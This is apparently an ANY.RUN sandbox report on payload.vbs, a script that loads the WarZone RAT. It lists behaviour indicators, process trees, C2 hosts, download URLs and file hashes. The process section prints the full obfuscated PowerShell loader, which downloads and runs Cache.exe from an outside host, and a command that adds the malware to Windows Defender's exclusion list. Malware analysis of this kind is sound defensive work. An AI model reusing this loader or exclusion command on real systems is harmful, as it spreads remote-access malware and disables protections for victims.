File name:

payload.vbs

Full analysis: https://app.any.run/tasks/68c5297b-cad9-480a-9979-52ad78b3cbaa
Verdict: Malicious activity
Threats:

WarZone RAT is a remote access trojan, which is written in C++ and offered as a malware-as-a-service. It packs a wide range of capabilities, from stealing victims’ files and passwords to capturing desktop activities. WarZone RAT is primarily distributed via phishing emails and receives regular updates from its C2.

Malware Trends Tracker     >>>
Analysis date: September 30, 2023, 18:10:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
loader
warzone
rat
remote
avemaria
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines
MD5:

EBD8D4466968F9459C1E6CE8D3089371

SHA1:

87CA4C6C2A9F60C3E732345F64A2193726FBBAC0

SHA256:

9EDCA23169D5993D4741088D4615576995EDCB96B6EC2614ADA0FEB8792E3D75

SSDEEP:

1536:WdxPs2Sg7fWmSVpYXclxFkonXBLbicyjTj45:72SSWj5VcjTj45

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • wscript.exe (PID: 3296)

    • Drops the executable file immediately after the start

      • powershell.exe (PID: 3080)
      • Cache.exe (PID: 3380)

    • Application was dropped or rewritten from another process

      • Cache.exe (PID: 3380)
      • svchost.exe (PID: 1896)

    • Adds path to the Windows Defender exclusion list

      • svchost.exe (PID: 1896)

    • WARZONE was detected

      • mscorsvw.exe (PID: 2884)

    • WARZONE detected by memory dumps

      • mscorsvw.exe (PID: 2884)

    • Connects to the CnC server

      • mscorsvw.exe (PID: 2884)

    • AVEMARIA was detected

      • mscorsvw.exe (PID: 2884)

  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • wscript.exe (PID: 3296)

    • Unusual connection from system programs

      • powershell.exe (PID: 3080)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3296)
      • svchost.exe (PID: 1896)

    • Reads the Internet Settings

      • powershell.exe (PID: 3080)
      • wscript.exe (PID: 3296)
      • svchost.exe (PID: 1896)

    • Probably download files using WebClient

      • wscript.exe (PID: 3296)

    • Powershell scripting: start process

      • wscript.exe (PID: 3296)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 3080)

    • Starts CMD.EXE for commands execution

      • Cache.exe (PID: 3380)

    • Executing commands from a ".bat" file

      • Cache.exe (PID: 3380)

    • Creates executable files that already exist in Windows

      • Cache.exe (PID: 3380)

    • The process creates files with name similar to system file names

      • Cache.exe (PID: 3380)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 2680)

    • Script adds exclusion path to Windows Defender

      • svchost.exe (PID: 1896)

    • Connects to unusual port

      • mscorsvw.exe (PID: 2884)

  • INFO

    • The executable file from the user directory is run by the Powershell process

      • Cache.exe (PID: 3380)

    • Checks supported languages

      • Cache.exe (PID: 3380)
      • svchost.exe (PID: 1896)
      • mscorsvw.exe (PID: 2884)

    • Reads the computer name

      • Cache.exe (PID: 3380)
      • mscorsvw.exe (PID: 2884)
      • svchost.exe (PID: 1896)

    • Reads the machine GUID from the registry

      • Cache.exe (PID: 3380)
      • svchost.exe (PID: 1896)
      • mscorsvw.exe (PID: 2884)

    • Create files in a temporary directory

      • Cache.exe (PID: 3380)

    • Creates files or folders in the user directory

      • Cache.exe (PID: 3380)
      • mscorsvw.exe (PID: 2884)

    • The executable file from the user directory is run by the CMD process

      • svchost.exe (PID: 1896)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

WarZone

(PID) Process(2884) mscorsvw.exe
C2 (2)Superherocan.mywire.org:5200
SuperGuy.camdvr.org:6000
BuildID2ATGDKGAR24
Options
Install FlagFalse
Startup FlagFalse
Reverse Proxy local port5000
Offline logTrue
PersistanceFalse
UAC bypassFalse
Defender bypassFalse
Use ADSFalse
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
9
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start wscript.exe no specs powershell.exe winword.exe no specs cache.exe no specs cmd.exe no specs timeout.exe no specs svchost.exe no specs powershell.exe no specs #WARZONE mscorsvw.exe

Process information

PID
CMD
Path
Indicators
Parent process
308"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Roaming\75K_EMAIL_USERPASS.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEpowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.5123.5000
788timeout 3 C:\Windows\SysWOW64\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1896"C:\Users\admin\AppData\Roaming\svchost.exe" C:\Users\admin\AppData\Roaming\svchost.execmd.exe
User:
admin
Company:
EVAwoHec
Integrity Level:
MEDIUM
Description:
ORaJI uuEx UmOIaKeFuYa EeIhI eQIcOgOTo.
Exit code:
0
Version:
7.50.939.23
2680C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\tmp70BC.tmp.bat""C:\Windows\SysWOW64\cmd.exeCache.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2884"C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
.NET Runtime Optimization Service
Exit code:
0
Version:
4.7.2558.0 built by: NET471REL1
WarZone
(PID) Process(2884) mscorsvw.exe
C2 (2)Superherocan.mywire.org:5200
SuperGuy.camdvr.org:6000
BuildID2ATGDKGAR24
Options
Install FlagFalse
Startup FlagFalse
Reverse Proxy local port5000
Offline logTrue
PersistanceFalse
UAC bypassFalse
Defender bypassFalse
Use ADSFalse
3080"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QCyOP($LfxxvIXuk, $nsNHppl){[IO.File]::WriteAllBytes($LfxxvIXuk, $nsNHppl)};function UTgnMckai($LfxxvIXuk){if($LfxxvIXuk.EndsWith((PzWDEgSp @(42681,42735,42743,42743))) -eq $True){Start-Process (PzWDEgSp @(42749,42752,42745,42735,42743,42743,42686,42685,42681,42736,42755,42736)) $LfxxvIXuk}else{Start-Process $LfxxvIXuk}};function oWcFuS($QAGuEuW){$GEWkFQ = New-Object (PzWDEgSp @(42713,42736,42751,42681,42722,42736,42733,42702,42743,42740,42736,42745,42751));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$nsNHppl = $GEWkFQ.DownloadData($QAGuEuW);return $nsNHppl};function PzWDEgSp($DwsEszM){$xAvBHV=42635;$YxQnI=$Null;foreach($GJWJwE in $DwsEszM){$YxQnI+=[char]($GJWJwE-$xAvBHV)};return $YxQnI};function fMxFFYYf(){$fFIONeQho = $env:APPDATA + '\';$KpdLa = oWcFuS (PzWDEgSp @(42739,42751,42751,42747,42750,42693,42682,42682,42754,42754,42754,42681,42737,42749,42736,42736,42734,42749,42756,42747,42751,42746,42749,42746,42733,42746,42751,42681,42734,42746,42744,42682,42717,42736,42743,42736,42732,42750,42736,42682,42690,42688,42710,42730,42704,42712,42700,42708,42711,42730,42720,42718,42704,42717,42715,42700,42718,42718,42681,42749,42751,42737));$ZgzkEmW = $fFIONeQho + '75K_EMAIL_USERPASS.rtf';QCyOP $ZgzkEmW $KpdLa;UTgnMckai $ZgzkEmW;;$TobweY = oWcFuS (PzWDEgSp @(42739,42751,42751,42747,42750,42693,42682,42682,42754,42754,42754,42681,42737,42749,42736,42736,42734,42749,42756,42747,42751,42746,42749,42746,42733,42746,42751,42681,42734,42746,42744,42682,42717,42736,42743,42736,42732,42750,42736,42682,42702,42732,42734,42739,42736,42681,42736,42755,42736));$pXbEDyNl = $fFIONeQho + 'Cache.exe';QCyOP $pXbEDyNl $TobweY;UTgnMckai $pXbEDyNl;;;}fMxFFYYf;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
3176"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\admin\AppData\Roaming\svchost.exe" -ForceC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
3296"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\payload.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3380"C:\Users\admin\AppData\Roaming\Cache.exe" C:\Users\admin\AppData\Roaming\Cache.exepowershell.exe
User:
admin
Company:
EVAwoHec
Integrity Level:
MEDIUM
Description:
ORaJI uuEx UmOIaKeFuYa EeIhI eQIcOgOTo.
Exit code:
0
Version:
7.50.939.23
Total events
0
Read events
0
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
7
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
308WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3BE0.tmp.cvr
MD5:
SHA256:
308WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0000.doc
MD5:
SHA256:
308WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0001.doc
MD5:
SHA256:
3080powershell.exeC:\Users\admin\AppData\Roaming\75K_EMAIL_USERPASS.rtftext
MD5:EDAE6BE553EA0DF5905B398047BCDDB8
SHA256:4D3612EA1EF31B5D213D0F199A7FC661DA70AC24E78A6180ACBB0E49C66257F2
3080powershell.exeC:\Users\admin\AppData\Roaming\Cache.exeexecutable
MD5:19FACA8998FC47A4ED790B4C8CBC4E6B
SHA256:86C94E5F96B047700F26F29D0F0ECF7BC76C78883C859E4D26FE4F3E3E00E7AD
3380Cache.exeC:\Users\admin\AppData\Local\Temp\tmp70BC.tmp.battext
MD5:D76DE334DADD5F50AC32212D9C9E2EE0
SHA256:84D3177F8CD041A09EACE21034542AE0D60F33EEEA9CC1CF9B682CD1D7B9C172
3080powershell.exeC:\Users\admin\AppData\Local\Temp\ssed25bn.rry.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3176powershell.exeC:\Users\admin\AppData\Local\Temp\vsdf02ho.5r3.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3080powershell.exeC:\Users\admin\AppData\Local\Temp\3mwkonp4.ubs.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
308WINWORD.EXEC:\Users\admin\AppData\Roaming\~$K_EMAIL_USERPASS.rtfbinary
MD5:4C7E3C90A531F4B4A74D4176A17AA427
SHA256:F58F357A5709038DD3B973F99C03E462BEE7253095AC223856335E1DF540F14E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
6
DNS requests
3
Threats
19

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
www.freecryptorobot.com:443
https://www.freecryptorobot.com/Release/75K_EMAIL_USERPASS.rtf
unknown
text
2.20 Mb
GET
200
www.freecryptorobot.com:443
https://www.freecryptorobot.com/Release/Cache.exe
unknown
executable
1015 Kb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1208
svchost.exe
239.255.255.250:1900
whitelisted
332
svchost.exe
224.0.0.252:5355
unknown
3080
powershell.exe
194.87.14.76:443
www.freecryptorobot.com
HostSlick
CZ
unknown
2884
mscorsvw.exe
185.225.74.106:5200
Superherocan.mywire.org
AS-DC
US
unknown

DNS requests

Domain
IP
Reputation
www.freecryptorobot.com
  • 194.87.14.76
unknown
Superherocan.mywire.org
  • 185.225.74.106
unknown

Threats

PID
Process
Class
Message
332
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.mywire .org Domain
2884
mscorsvw.exe
A Network Trojan was detected
ET MALWARE Warzone RAT Response (Inbound)
17 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
payload.vbs